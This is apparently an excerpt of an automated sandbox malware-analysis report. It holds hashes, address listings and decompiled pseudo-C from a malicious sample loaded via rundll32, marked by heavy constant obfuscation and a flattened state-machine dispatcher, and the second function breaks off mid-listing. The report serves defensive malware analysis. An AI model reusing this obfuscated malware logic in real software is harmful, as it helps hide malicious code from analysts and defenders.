                                                                                                                                    • API String ID: 0-652707834
                                                                                                                                    • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                    • Instruction ID: 2cdbd1558b0416c72f4dd5710d553ae82d61a043771145fd5604f83492edcf4a
                                                                                                                                    • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                    • Instruction Fuzzy Hash: 5212317251C3809FD368DF25C88AB5BBBE2BBC4344F108A2DE5C986260D7B19959CF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E002C81B7() {
                                                                                                                                    				void* _t347;
                                                                                                                                    				signed int _t350;
                                                                                                                                    				signed int _t351;
                                                                                                                                    				signed int _t353;
                                                                                                                                    				signed int _t355;
                                                                                                                                    				signed int _t360;
                                                                                                                                    				signed int _t364;
                                                                                                                                    				void* _t374;
                                                                                                                                    				intOrPtr _t407;
                                                                                                                                    				signed int _t411;
                                                                                                                                    				signed int _t414;
                                                                                                                                    				signed int _t415;
                                                                                                                                    				signed int _t416;
                                                                                                                                    				signed int _t417;
                                                                                                                                    				signed int _t418;
                                                                                                                                    				signed int _t419;
                                                                                                                                    				signed int _t420;
                                                                                                                                    				signed int* _t422;
                                                                                                                                    				void* _t426;
                                                                                                                                    
                                                                                                                                    				 *(_t426 + 0x74) = 0xd212a7;
                                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
                                                                                                                                    				_t374 = 0xebf23c2;
                                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
                                                                                                                                    				 *(_t426 + 0x20) = 0x60274e;
                                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                                    				_t414 = 0x29;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
                                                                                                                                    				 *(_t426 + 0x9c) = 0x5f71eb;
                                                                                                                                    				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
                                                                                                                                    				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
                                                                                                                                    				 *(_t426 + 0x1c) = 0x8735e4;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
                                                                                                                                    				 *(_t426 + 0x58) = 0x9ed5c5;
                                                                                                                                    				_t415 = 0x17;
                                                                                                                                    				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
                                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
                                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
                                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
                                                                                                                                    				 *(_t426 + 0x5c) = 0x8fe0dc;
                                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
                                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
                                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
                                                                                                                                    				 *(_t426 + 0x48) = 0x18253c;
                                                                                                                                    				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
                                                                                                                                    				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
                                                                                                                                    				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
                                                                                                                                    				 *(_t426 + 0x94) = 0x40d4a3;
                                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
                                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
                                                                                                                                    				 *(_t426 + 0x20) = 0x8fc5ff;
                                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
                                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
                                                                                                                                    				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
                                                                                                                                    				 *(_t426 + 0x38) = 0x52431;
                                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
                                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
                                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
                                                                                                                                    				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
                                                                                                                                    				 *(_t426 + 0x44) = 0xc4652;
                                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
                                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
                                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
                                                                                                                                    				 *(_t426 + 0x10) = 0x2c06e;
                                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
                                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
                                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
                                                                                                                                    				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
                                                                                                                                    				 *(_t426 + 0x7c) = 0xc3ec9d;
                                                                                                                                    				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
                                                                                                                                    				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
                                                                                                                                    				 *(_t426 + 0x70) = 0x3416d6;
                                                                                                                                    				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
                                                                                                                                    				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
                                                                                                                                    				 *(_t426 + 0x64) = 0x1e8df6;
                                                                                                                                    				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
                                                                                                                                    				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
                                                                                                                                    				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
                                                                                                                                    				 *(_t426 + 0x28) = 0xebc79e;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
                                                                                                                                    				 *(_t426 + 0x4c) = 0x6795aa;
                                                                                                                                    				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
                                                                                                                                    				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
                                                                                                                                    				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
                                                                                                                                    				 *(_t426 + 0x50) = 0xbc4be8;
                                                                                                                                    				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
                                                                                                                                    				_t416 = 0x6f;
                                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
                                                                                                                                    				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
                                                                                                                                    				 *(_t426 + 0x94) = 0xde468f;
                                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
                                                                                                                                    				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
                                                                                                                                    				 *(_t426 + 0x18) = 0x6e4fa6;
                                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
                                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
                                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
                                                                                                                                    				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
                                                                                                                                    				 *(_t426 + 0x5c) = 0xc77145;
                                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
                                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
                                                                                                                                    				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
                                                                                                                                    				 *(_t426 + 0x44) = 0x492c53;
                                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
                                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
                                                                                                                                    				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
                                                                                                                                    				 *(_t426 + 0xa0) = 0x27589;
                                                                                                                                    				_t417 = 0x3e;
                                                                                                                                    				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
                                                                                                                                    				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
                                                                                                                                    				 *(_t426 + 0x30) = 0xb4bbc8;
                                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
                                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
                                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
                                                                                                                                    				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
                                                                                                                                    				 *(_t426 + 0x28) = 0xdf5b34;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
                                                                                                                                    				_t418 = 0x5e;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
                                                                                                                                    				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
                                                                                                                                    				 *(_t426 + 0x90) = 0xff684d;
                                                                                                                                    				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
                                                                                                                                    				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
                                                                                                                                    				 *(_t426 + 0x20) = 0x90e304;
                                                                                                                                    				_t419 = 0x7f;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
                                                                                                                                    				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
                                                                                                                                    				 *(_t426 + 0x60) = 0xa4eb1a;
                                                                                                                                    				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
                                                                                                                                    				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
                                                                                                                                    				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
                                                                                                                                    				 *(_t426 + 0x34) = 0xdaab0d;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
                                                                                                                                    				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
                                                                                                                                    				 *(_t426 + 0x68) = 0xbbaf5f;
                                                                                                                                    				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
                                                                                                                                    				_t372 =  *(_t426 + 0x6c);
                                                                                                                                    				_t411 =  *(_t426 + 0x6c);
                                                                                                                                    				_t424 =  *(_t426 + 0x6c);
                                                                                                                                    				_t420 =  *(_t426 + 0x6c);
                                                                                                                                    				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
                                                                                                                                    				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
                                                                                                                                    				 *(_t426 + 0x74) = 0xfd4b1c;
                                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
                                                                                                                                    				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
                                                                                                                                    				 *(_t426 + 0x88) = 0xbb9d8e;
                                                                                                                                    				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
                                                                                                                                    				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
                                                                                                                                    				 *(_t426 + 0x3c) = 0x9303e6;
                                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
                                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
                                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
                                                                                                                                    				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
                                                                                                                                    				 *(_t426 + 0x80) = 0xaf4918;
                                                                                                                                    				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
                                                                                                                                    				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
                                                                                                                                    				 *(_t426 + 0x78) = 0xd8d1b1;
                                                                                                                                    				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
                                                                                                                                    				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t347 = 0xfb52c5;
                                                                                                                                    					L2:
                                                                                                                                    					while(_t374 != 0xd963e9) {
                                                                                                                                    						if(_t374 == _t347) {
                                                                                                                                    							_t350 = E002DC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
                                                                                                                                    							_t426 = _t426 + 0x2c;
                                                                                                                                    							__eflags = _t350;
                                                                                                                                    							if(_t350 == 0) {
                                                                                                                                    								_t351 =  *(_t426 + 0xa0);
                                                                                                                                    							} else {
                                                                                                                                    								_t422 = _t411;
                                                                                                                                    								while(1) {
                                                                                                                                    									__eflags = _t422[1] - 4;
                                                                                                                                    									if(_t422[1] != 4) {
                                                                                                                                    										goto L20;
                                                                                                                                    									}
                                                                                                                                    									L19:
                                                                                                                                    									_t355 = E002CB23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
                                                                                                                                    									_t426 = _t426 + 0x10;
                                                                                                                                    									__eflags = _t355;
                                                                                                                                    									if(_t355 == 0) {
                                                                                                                                    										_t351 = 1;
                                                                                                                                    										 *(_t426 + 0xa0) = 1;
                                                                                                                                    									} else {
                                                                                                                                    										goto L20;
                                                                                                                                    									}
                                                                                                                                    									L25:
                                                                                                                                    									_t420 =  *(_t426 + 0x6c);
                                                                                                                                    									goto L26;
                                                                                                                                    									L20:
                                                                                                                                    									_t353 =  *_t422;
                                                                                                                                    									__eflags = _t353;
                                                                                                                                    									if(_t353 == 0) {
                                                                                                                                    										_t351 =  *(_t426 + 0xa0);
                                                                                                                                    									} else {
                                                                                                                                    										_t422 = _t422 + _t353;
                                                                                                                                    										__eflags = _t422[1] - 4;
                                                                                                                                    										if(_t422[1] != 4) {
                                                                                                                                    											goto L20;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    									goto L25;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L26:
                                                                                                                                    							__eflags = _t351;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								_t347 = 0xfb52c5;
                                                                                                                                    								_t374 = 0xfb52c5;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								_t407 =  *0x2e3e0c; // 0x0
                                                                                                                                    								E002D458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
                                                                                                                                    								_t374 = 0xd963e9;
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    							L32:
                                                                                                                                    						} else {
                                                                                                                                    							if(_t374 == 0x247652d) {
                                                                                                                                    								_t360 = E002C8F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
                                                                                                                                    								_t372 = _t360;
                                                                                                                                    								_t426 = _t426 + 0x28;
                                                                                                                                    								__eflags = _t360 - 0xffffffff;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_t374 = 0x7db0050;
                                                                                                                                    									while(1) {
                                                                                                                                    										L1:
                                                                                                                                    										_t347 = 0xfb52c5;
                                                                                                                                    										goto L2;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t374 == 0x4334ccc) {
                                                                                                                                    									E002DDA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
                                                                                                                                    									_t364 = E002CB6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
                                                                                                                                    									_t424 = _t364;
                                                                                                                                    									_t426 = _t426 + 0x18;
                                                                                                                                    									_t374 = 0x247652d;
                                                                                                                                    									 *((short*)(_t364 - 2)) = 0;
                                                                                                                                    									while(1) {
                                                                                                                                    										L1:
                                                                                                                                    										_t347 = 0xfb52c5;
                                                                                                                                    										goto L2;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									if(_t374 == 0x7db0050) {
                                                                                                                                    										_t420 = 0x1000;
                                                                                                                                    										_push(_t374);
                                                                                                                                    										_push(_t374);
                                                                                                                                    										 *(_t426 + 0x74) = 0x1000;
                                                                                                                                    										_t411 = E002C7FF2(0x1000);
                                                                                                                                    										_t347 = 0xfb52c5;
                                                                                                                                    										__eflags = _t411;
                                                                                                                                    										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t374 == 0xebf23c2) {
                                                                                                                                    											_t374 = 0x4334ccc;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t374 != 0xf828486) {
                                                                                                                                    												L30:
                                                                                                                                    												__eflags = _t374 - 0x24bb42a;
                                                                                                                                    												if(__eflags != 0) {
                                                                                                                                    													continue;
                                                                                                                                    												} else {
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												E002D1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						return 0;
                                                                                                                                    						goto L32;
                                                                                                                                    					}
                                                                                                                                    					E002D8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
                                                                                                                                    					_t374 = 0xf828486;
                                                                                                                                    					_t347 = 0xfb52c5;
                                                                                                                                    					goto L30;
                                                                                                                                    				}
                                                                                                                                    			}






















                                                                                                                                    0x002c881a
                                                                                                                                    0x002c8832
                                                                                                                                    0x002c8837
                                                                                                                                    0x002c883a
                                                                                                                                    0x002c883c
                                                                                                                                    0x002c884a
                                                                                                                                    0x002c884b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8864
                                                                                                                                    0x002c8864
                                                                                                                                    0x00000000
                                                                                                                                    0x002c883e
                                                                                                                                    0x002c883e
                                                                                                                                    0x002c8840
                                                                                                                                    0x002c8842
                                                                                                                                    0x002c885d
                                                                                                                                    0x002c8844
                                                                                                                                    0x002c8844
                                                                                                                                    0x002c8814
                                                                                                                                    0x002c8818
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8818
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8842
                                                                                                                                    0x002c8814
                                                                                                                                    0x002c8868
                                                                                                                                    0x002c8868
                                                                                                                                    0x002c886a
                                                                                                                                    0x002c888d
                                                                                                                                    0x002c8892
                                                                                                                                    0x00000000
                                                                                                                                    0x002c886c
                                                                                                                                    0x002c8870
                                                                                                                                    0x002c887d
                                                                                                                                    0x002c8883
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8883
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8692
                                                                                                                                    0x002c8698
                                                                                                                                    0x002c87b9
                                                                                                                                    0x002c87be
                                                                                                                                    0x002c87c0
                                                                                                                                    0x002c87c3
                                                                                                                                    0x002c87c6
                                                                                                                                    0x002c87cc
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c869e
                                                                                                                                    0x002c86a4
                                                                                                                                    0x002c874a
                                                                                                                                    0x002c8765
                                                                                                                                    0x002c876a
                                                                                                                                    0x002c876c
                                                                                                                                    0x002c8771
                                                                                                                                    0x002c8776
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c86aa
                                                                                                                                    0x002c86b0
                                                                                                                                    0x002c86ff
                                                                                                                                    0x002c870e
                                                                                                                                    0x002c870f
                                                                                                                                    0x002c8710
                                                                                                                                    0x002c871a
                                                                                                                                    0x002c871c
                                                                                                                                    0x002c8722
                                                                                                                                    0x002c8729
                                                                                                                                    0x00000000
                                                                                                                                    0x002c86b2
                                                                                                                                    0x002c86b8
                                                                                                                                    0x002c86f4
                                                                                                                                    0x00000000
                                                                                                                                    0x002c86ba
                                                                                                                                    0x002c86c0
                                                                                                                                    0x002c88b2
                                                                                                                                    0x002c88b2
                                                                                                                                    0x002c88b8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c88be
                                                                                                                                    0x002c86c6
                                                                                                                                    0x002c86dd
                                                                                                                                    0x002c86e2
                                                                                                                                    0x002c86c0
                                                                                                                                    0x002c86b8
                                                                                                                                    0x002c86b0
                                                                                                                                    0x002c86a4
                                                                                                                                    0x002c8698
                                                                                                                                    0x002c86f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002c86f1
                                                                                                                                    0x002c88a2
                                                                                                                                    0x002c88a8
                                                                                                                                    0x002c88ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002c88ad

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                                    • API String ID: 0-1837206032
                                                                                                                                    • Opcode ID: 560c8e2c9d8bb7ba98cce258937ca73dc5a328667f5b0a6bdf414241b3daa064
                                                                                                                                    • Instruction ID: 6f342d154b4d286d166386f334a1e56e9fe1b9f0a9f0fc50dabb877007b2c23c
                                                                                                                                    • Opcode Fuzzy Hash: 560c8e2c9d8bb7ba98cce258937ca73dc5a328667f5b0a6bdf414241b3daa064
                                                                                                                                    • Instruction Fuzzy Hash: A50241711183819FD368CF25C48AA5BBBE1FBC4758F508A1DF2DA86260DBB48849CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002DC631(void* __ecx) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				unsigned int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				void* _t214;
                                                                                                                                    				void* _t220;
                                                                                                                                    				void* _t224;
                                                                                                                                    				void* _t228;
                                                                                                                                    				void* _t229;
                                                                                                                                    				void* _t233;
                                                                                                                                    				void* _t234;
                                                                                                                                    				signed int _t236;
                                                                                                                                    				signed int _t237;
                                                                                                                                    				signed int _t238;
                                                                                                                                    				void* _t248;
                                                                                                                                    				void* _t249;
                                                                                                                                    				signed int* _t251;
                                                                                                                                    				void* _t254;
                                                                                                                                    
                                                                                                                                    				_t251 =  &_v92;
                                                                                                                                    				_t234 = __ecx;
                                                                                                                                    				_v56 = 0x6c25e6;
                                                                                                                                    				_v56 = _v56 >> 0xf;
                                                                                                                                    				_v56 = _v56 >> 0xd;
                                                                                                                                    				_v56 = _v56 ^ 0x000b07b8;
                                                                                                                                    				_v60 = 0xfeb19f;
                                                                                                                                    				_v60 = _v60 | 0xe5cfed25;
                                                                                                                                    				_v60 = _v60 ^ 0x26a25afc;
                                                                                                                                    				_v60 = _v60 ^ 0xc355f8a5;
                                                                                                                                    				_v20 = 0x71f317;
                                                                                                                                    				_v20 = _v20 >> 1;
                                                                                                                                    				_v20 = _v20 ^ 0x003a157d;
                                                                                                                                    				_v64 = 0x229c82;
                                                                                                                                    				_v64 = _v64 >> 6;
                                                                                                                                    				_v64 = _v64 + 0x6845;
                                                                                                                                    				_v64 = _v64 ^ 0x000e1a2d;
                                                                                                                                    				_v80 = 0xaa3c23;
                                                                                                                                    				_v80 = _v80 + 0x9f20;
                                                                                                                                    				_v80 = _v80 + 0x8b23;
                                                                                                                                    				_v80 = _v80 | 0x21cd8be9;
                                                                                                                                    				_v80 = _v80 ^ 0x21ed2977;
                                                                                                                                    				_v84 = 0xa275e1;
                                                                                                                                    				_v84 = _v84 >> 0xd;
                                                                                                                                    				_t248 = 0;
                                                                                                                                    				_t236 = 0x36;
                                                                                                                                    				_v84 = _v84 / _t236;
                                                                                                                                    				_v84 = _v84 | 0x6f301759;
                                                                                                                                    				_t249 = 0xe982267;
                                                                                                                                    				_v84 = _v84 ^ 0x6f339045;
                                                                                                                                    				_v88 = 0x6e61be;
                                                                                                                                    				_v88 = _v88 ^ 0xaf54e0d1;
                                                                                                                                    				_v88 = _v88 >> 4;
                                                                                                                                    				_v88 = _v88 | 0xfa70c1e6;
                                                                                                                                    				_v88 = _v88 ^ 0xfaf0db59;
                                                                                                                                    				_v8 = 0x2c245a;
                                                                                                                                    				_v8 = _v8 << 8;
                                                                                                                                    				_v8 = _v8 ^ 0x2c2bf9b3;
                                                                                                                                    				_v36 = 0xcb696d;
                                                                                                                                    				_v36 = _v36 >> 4;
                                                                                                                                    				_v36 = _v36 << 5;
                                                                                                                                    				_v36 = _v36 ^ 0x019dc7aa;
                                                                                                                                    				_v76 = 0xb5019c;
                                                                                                                                    				_v76 = _v76 + 0xffffd3ce;
                                                                                                                                    				_t237 = 0x3a;
                                                                                                                                    				_v76 = _v76 / _t237;
                                                                                                                                    				_v76 = _v76 + 0xe675;
                                                                                                                                    				_v76 = _v76 ^ 0x000db5c6;
                                                                                                                                    				_v40 = 0x1e681a;
                                                                                                                                    				_t238 = 0x22;
                                                                                                                                    				_v40 = _v40 / _t238;
                                                                                                                                    				_v40 = _v40 + 0x9449;
                                                                                                                                    				_v40 = _v40 ^ 0x00094c29;
                                                                                                                                    				_v12 = 0x15a3d6;
                                                                                                                                    				_v12 = _v12 * 0x6f;
                                                                                                                                    				_v12 = _v12 ^ 0x096cbb26;
                                                                                                                                    				_v44 = 0x420567;
                                                                                                                                    				_v44 = _v44 * 0x2b;
                                                                                                                                    				_v44 = _v44 >> 8;
